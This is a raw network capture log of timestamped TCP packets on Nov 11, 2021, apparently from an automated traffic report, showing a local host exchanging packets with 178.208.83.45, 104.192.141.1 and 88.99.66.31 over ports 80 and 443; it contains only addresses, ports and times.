                                                                                                                                                                                Nov 11, 2021 12:27:27.320678949 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.320772886 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.320801973 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.321043968 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.321089029 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.321116924 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.345582008 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345599890 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345664024 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345678091 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345685005 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345731020 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.345777035 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345782995 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.345788002 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.345791101 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345798969 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345828056 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.345835924 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.345839024 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.345895052 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.345978975 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345992088 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.345999002 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.346007109 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.346020937 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.346034050 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.346059084 CET8049862178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:27.346081972 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.346148968 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.346157074 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:27.346158981 CET4986280192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.045228958 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.070492983 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.070645094 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.071530104 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.072115898 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.073148012 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.073410988 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.096834898 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.096921921 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.097057104 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.098391056 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.098434925 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.098504066 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.098507881 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.098539114 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.098555088 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.098567963 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.098586082 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.098627090 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.123765945 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.123788118 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.123795986 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.123910904 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.123950958 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.124083042 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.126363993 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.126646996 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.126662016 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.126668930 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.126782894 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.138959885 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.151669979 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151686907 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151700974 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151729107 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151745081 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151768923 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.151788950 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.151797056 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.151798964 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.151804924 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151839972 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.151859045 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151860952 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.151937008 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151937008 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.151951075 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.151969910 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.152024984 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.152050972 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.152110100 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.152123928 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.152129889 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.152132988 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.152133942 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.152134895 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.152148008 CET8049863178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:28.152245998 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.152256012 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.152266026 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:28.152270079 CET4986380192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.232889891 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.258052111 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.258728027 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.259401083 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.259869099 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.260319948 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.260720015 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.284493923 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.284523964 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.284621954 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.285332918 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.285352945 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.285373926 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.285392046 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.285454035 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.285567045 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.285660028 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.285742998 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.310518980 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.310553074 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.310584068 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.310631990 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.310672998 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.310745001 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.310782909 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.310836077 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.310866117 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.310872078 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.310889006 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.310939074 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.310959101 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.311007023 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.311983109 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.312026024 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336035967 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336080074 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336108923 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336134911 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336173058 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336216927 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336224079 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336229086 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336297989 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336328030 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336353064 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336391926 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336400032 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336404085 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336514950 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336541891 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336607933 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336617947 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336625099 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336708069 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336783886 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336836100 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336841106 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336850882 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336857080 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.336971998 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.336997032 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.337093115 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.337095022 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.337101936 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.337105989 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.337151051 CET8049864178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:29.337254047 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:29.337271929 CET4986480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.426590919 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.452940941 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.453289032 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.463103056 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.463135004 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.463226080 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.463255882 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.488357067 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.488425970 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.488464117 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.488492012 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.488517046 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.488549948 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.488576889 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.488610029 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.488652945 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.488694906 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.488713026 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.488727093 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.488727093 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.490159035 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.514594078 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.514699936 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.514722109 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.514743090 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.514760017 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.514771938 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.514789104 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.514832020 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.514866114 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.515064001 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.515191078 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.517972946 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.518043041 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.518157959 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.535418987 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.535864115 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.535885096 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.541492939 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.541589975 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.541614056 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.541651011 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.541724920 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.541793108 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542496920 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542530060 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542589903 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.542654037 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.542686939 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.542715073 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.542746067 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.542758942 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542763948 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542764902 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.542778015 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.542793989 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542814016 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542860031 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542871952 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.542922020 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.543945074 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.544030905 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.544059992 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.544229031 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.545056105 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.545100927 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.545125008 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.545198917 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.545252085 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.545267105 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.545319080 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.545322895 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.545845985 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.545912027 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.561141014 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.561244011 CET8049865178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:30.561414003 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:30.561491966 CET4986580192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:31.785689116 CET804978288.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:31.785928965 CET4978280192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:32.071265936 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.071646929 CET44349866104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:32.071851969 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.093796968 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.093825102 CET44349866104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:32.430705070 CET44349866104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:32.431169033 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.441890955 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.441921949 CET44349866104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:32.442833900 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.442935944 CET44349866104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:32.627691031 CET44349866104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:32.627783060 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.627793074 CET44349866104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:32.627846956 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.647814989 CET49866443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:32.647959948 CET44349866104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:34.504251957 CET4986780192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:34.530760050 CET8049867178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:34.531069040 CET4986780192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:34.541013956 CET4986780192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:34.566435099 CET8049867178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:34.566498041 CET8049867178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:34.566529989 CET8049867178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:34.566678047 CET4986780192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:34.566942930 CET4986780192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:35.100594044 CET4986880192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.122284889 CET804986888.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.122479916 CET4986880192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.122633934 CET4986880192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.144140005 CET804986888.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.144159079 CET804986888.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.144290924 CET4986880192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.151510954 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.151592970 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.151731014 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.155563116 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.155596972 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.201536894 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.201633930 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.221992970 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.222038031 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.222378969 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.222441912 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.223433971 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.264898062 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.289921999 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.290018082 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.290045977 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.290101051 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.290127039 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.290179968 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.290851116 CET49869443192.168.2.588.99.66.31
